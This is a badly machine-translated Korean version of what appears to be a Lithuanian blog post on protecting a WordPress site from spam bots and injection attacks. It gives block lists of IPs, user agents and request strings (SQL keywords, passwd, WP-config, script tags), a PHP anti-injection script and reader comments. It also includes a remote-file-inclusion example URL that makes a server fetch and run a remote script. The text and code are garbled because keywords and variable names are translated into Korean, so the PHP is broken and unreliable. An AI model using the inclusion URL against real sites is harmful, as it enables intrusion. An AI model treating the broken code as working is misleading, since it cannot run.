당신은 아마 많은 경우, 웹 페이지 또는 블로그가 몇 가지 스크립트를 사용하여, 해킹 망치지 자동으로 많은 의미없는 익명 덧글을 오염하려고 알아. 물론 아주 자주 수동 모드 적용이 아주 인상적 번호 아비 에스 케이스, 방위 중 하나 방법은 정말 무엇인지 전혀 없어 -.. 요청을 확인하고 다른 IP 매개 변수 evildoer로 전송하고, 그들을 차단합니다. 그냥 내 제안된 방법을 사용, 자기 방어를 할뿐만 아니라, 또한 얼마나 자주 당신이 얼마나 멀리 그리고 공격하고 발견할 수 있습니다. 기타 ...
보호 블로그
- 디렉토리를 제공하지만 워드 프레스를 사용하는 "수동"방법은 안전하고 깨끗한 사이트에 있습니다 특별한 보호가 TimesToCome 보안 플러그인 . 설치한 후이 플러그인은 안전 매개 변수를 추가합니다. 당신이 잡은대로 이유의 일부 - 개인적으로, 다음과 같은 IP를 차단, 사용자 에이전트와 조회를 사용하여 여기에 쇼 (당신이 또한 기록을 사용할 수 있습니다.) 당신도 파이어 폭스, 인터넷 익스플로러에서 볼 수있는 경우에도 그리고 - 그것은 종종 로봇이라고합니다.
경고. Nepriisiimu IP, 사용자 에이전트, 쿼리, 모든 레코드가 적절한지 여부를 결정하는 모든 방문자를 떠나도록 차단 여기에 제공된 대한 책임.
차단된 IP :
(이것은 귀하의 IP 추방 목록입니다 :) | 차단된 사용자 에이전트
(이것은 그쪽 요원 추방 목록입니다) | 차단된 요청
(이것은 귀하의 요청 블랙리스트입니다) |
12.192.82.221
121.151.44.115
121.209.51.58
122133106125
123.224.54.112
124.59.113.24
125.141.64.124
128.163.2.43
131.220.64.240
137.48.217.20
142165135180
150.187.25.20
151.13.233.147
158.109.36.140
160.99.12.231
189104241248
190.183.61.18
190.196.2.205
190.196.5.189
193171110146
193.207.106.54
193.253.223.90
193.41.90.11
193.64.244.176
194.165.49.171
194219192251
194.244.39.57
195234106106
195.47.9.2
200.203.121.1
200.49.155.60
201.8.240.141
201.9.129.198
202.47.4.161
203.88.114.169
208.116.39.133
209.12.244.192
209.172.33.53
209195110123
209216249151
209.240.239.2
211.45.156.100
212.34.184.239
212.85.146.235
213.203.223.25
213.91.210.194
216.206.238.35
216.246.228.87
216.82.211.137
217198149178
217.64.177.199
218.186.13.3
218.234.19.139
219104211129
220.86.116.174
221.153.3.136
222.122.179.42
222.164.209.65
222.96.185.28
24.109.59.229
24.200.137.142 124.179.227.139
24.66.10.194
38.117.65.239
58.177.86.197
59.11.15.187 91.121.87.84
60.52.22.176
61.47.10.168
62.103.159.31
62128242180
62193211155
62.75.185.209
62.80.243.201
63.247.43.250
64.15.155.201
64185237191
64.21.98.196
64.246.187.54
65.254.54.218
65.254.63.210
65.95.110.16
65.95.153.184
65.98.67.106
66.135.41.76
66.98.244.93
67.15.48.60
67.18.29.218
67.202.60.246
67.219.69.45
67.68.20.251
67.70.127.164
67.71.176.187
68.147.159.38
69.128.204.74
69.14.152.152
69.157.22.63
69.159.63.161
69.94.120.198
70.85.201.66
70.86.30.82
70.87.240.50
71.101.46.11
71121104178
71.43.15.172
72.233.69.58
72.29.77.72
72.49.255.51
72.55.131.17
72.69.137.26
74.210.176.55
74.6.17.188
75125143162
76.66.125.33
76.68.22.147
76.71.160.65
77189155254
77203192230
78.111.68.37
78.130.75.90
78164157213
78.42.74.174
79133236143
79.136.97.34
79.66.133.114
79.76.213.251
80.146.78.213
80.218.173.93
80233176183
80.53.133.106
81.2.200.22
82.194.67.123
82.225.55.136
82.37.19.52
82.98.141.70
83.160.222.29
83.17.224.250
83240164232
83.65.47.4
83.81.61.72
84.165.87.140
84.72.120.152
85114140133
85157139109
85.171.82.87
85192189233
85.235.40.30
85.25.10.95
85.96.215.53
86.1.196.79
86109167160
86.109.96.134
86145194229
87.101.4.49
87106222144
87.234.201.76
87.61.174.29
88.119.99.10
88.214.192.29
88.223.50.146
88.244.162.64
88.252.145.65
88252149114
89.111.173.68
89.42.133.2
91121204165
91.186.11.35
91.84.19.133
91.89.198.178
92.233.76.213
92.4.112.196 64233183. * 61.103.33.48
92.61.36.98
96.247.65.124 | AnotherBot
botpaidtoclick
봇을 클릭
cr4nk
PR 5.3
DataCha0s
discobot
EBM-APPLE
EmailSearch
EmailSiphon
FAST ESP 문서 리트리버
Firefox 2.0에서
Ginxbot
GrubNG
gvfs
HTTrack
Incutio
인디 도서관
인터넷 익스플로러
인터넷 닌자
자바
JetBrains
libcurl
libwww - 펄
LWP-요청
LWP-하찮은
매킨토시, 나, PPC
Microsoft 데이터 액세스
MJ12bot
모피어스 망할 스캐너
모질라 파이어 폭스 5.0
Mozilla/4.0 (호환
Mozilla/4.08
Mozilla/4.61 (매킨토시
Mozilla/5/0 (호환
Mozilla/7.0
모질라 / 8
모질라 / 파이어 폭스
Mp3Bot
MSIE6
NIPGCrawler
PEAR
PECL
PHPot
프로토콜 공급자 살펴보기
PuxaRapido
Pycurl
파이썬 urllib
동안 보안
사이트 스나이퍼
SkyGrid
Sogou
sun4m
해돋이
syncrisis
topicblogs
사용자 - 에이전트
W3CRobot
W : PACBHO60
웹 :: 스크레이퍼
WebDAV를
WebRipper
Wget
window.location
위니 Poh
www.ranks.nl
X12R1
Xerka - 봇 | $ _GET
(자바 | VB)
. GIF?
. JPG?
. TXT?
. XML?
</ SCRIPT>
<SCRIPT>
? Page_id = http를 % 3A % 2F % 2F
관리자 - ajax.php?
관리자 - function.php?
아스키
board.php? FTP =를 참조
CAST
com_jd-WP
CONCAT
하셨음을
삭제
formmail
includedir =
index.php? 템플릿 =
삽입
LWP-하찮은
옵션
passwd
PATH =
POST / xmlrpc.php
PROPFIND
등록 + + + +
선택
sidebar.php?
연합
업데이트
워드 - 튜브 - button.php?
WP-구성
WP-login.php? 조치 = HTTP를 % 3A % 2F % 2F
WP-테이블 button.php?
WP-trackback.php?
X-aaaaaaaaa |
그들이 차단해야 할 쿼리와 이유는 무엇입니까? 하자 사이트 허점이라고하거나 (하지만 종종 그냥 연속으로 공격적인 쿼리를 공격하여) 공세 papuolėte의 지평선을 생각했습니다.
안전하지 않은 파일 sidebar.php은? 변수 = http://www.kompiuteriszombis.com/botas.txt, 서버가 botas.txt 스크립트를 실행되며, 당신은 대부분의 경우라고해도, 서버가 이미 쿼리 변수 VARIABLE sidebar.php을 보낸다고 쳐 해킹.
사이트 보안.
당신은 웹사이트가있는 경우,이 스크립트를 사용할 수 있습니다, 귀하의 index.php로 저장하고 nemapirškite를 변경할 필요가 email@email.com을 귀하의 이메일에. 이메일
/ ******************************* ANTIHACK START **************** ************** /
/ / 주사를 체크
$ Req = $ _SERVER [ 'REQUEST_URI'];
$ 그런 생각 그만하고는 = 폭발 ($ Req "?");
$ = $ Mi_url 그런 생각 그만하고 [0];
$ = $ 그런 생각 그만하고 레스토랑 [1];
/ / 여기서 여러분은 의지에서 의심 체인을 넣을 수 있습니다. 그냥은 신중하게
/ / 우연 귀하의 URL의 변수와 매개 변수를 요청하지
$ Inyecc = '/ 스크립트 | HTTP | <|> | % 3C | % 3E | 선택 | 연합 | 업데이트 | EXE | 간부인 | INSERT | tmp를 / I';
/ / 검출
IF (preg_match ($ inyecc, $ resto)은 &&! $ _REQUEST [ 'FullURL']) {
/ / 무언가를 만들고, 예제에서 관리자에게 전자 메일 알림을 보낼
/ / $ IP = $ HTTP_SERVER_VARS [ "HTTP_CLIENT_IP"];
$ IP = $ _SERVER [ 'REMOTE_ADDR'];
$ 전달한 = $ HTTP_SERVER_VARS [ 'HTTP_X_FORWARDED_FOR'];
$ = $ Remoteaddress HTTP_SERVER_VARS [ "REMOTE_ADDR"];
$ 메시지 mi_url $ \ N \ nchain에서 = "주입 공격 : $ resto \ N \ N
보낸 사람 : (IP-forwa-RA) : - $ IP - $ 전달된 - $ remoteaddress \ N \ N
--- 엔드 ------- ";
이메일 ( email@email.com , "주입 공격", $ 메시지,
"보낸 사람 :"정보 @ {$ _SERVER [ 'SERVER_NAME']} ","- fwebmaster @ {$ _SERVER [ 'SERVER_NAME']} ");
# # # # Uzbaninam 도요. htaccess로
$ FH = fopen ( 'htaccess로.', '') 또는 ( "파일을 열 수 없습니다.") 죽을;
$ Towrite는 = "\ N # $ remoteaddress - $ 휴식";
$ Towrite = "$에서 \ Ndeny IP \ N".;
fwrite ($ FH, $ towrite);
fclose ($ FH);
# # # #
/ / 메시지와 실행을 죽여라
에코 '불법 URL';
() 죽을;
}
/ ******************************* ANTIHACK 엔드 **************** ************** /
2008 12 20 10시 12분
dalikams 아파치 mod_security 전에 같은 오랜 시간이 만들어집니다 들어 - 나는 바퀴를 재발견 필요가 없습니다.
preg'o에 관해서는 - "FTP"프로토콜 "삭제 SQL 쿼리에 언급되지 않았습니다. 또한 쿼리뿐만 아니라 검사지만, 변수 이름 - 그럼이 코드를 사용하기 전에, 각각은 중요한 것을 고려해야 사용
베자, SQL 주입 할 일들과 왼쪽에 끝낼 수 있죠 "?"Eančia 주소입니다.
시스템 코드가 구부러진 경우 - 그냥 요청이 충분히 보호되지 않습니다 GET, 게시물 및 쿠키를 필터링해야합니다.
그것은 단순히 어떤 장소에서, 어디서나 리투아니아 코드 주석을보고 훨씬 더 기쁠 것이다.
음, htaccess 파일에 대한 인증서 -.없는 안전한 직업. 물론, 모든 호스트 시스템에 따라 다릅니다.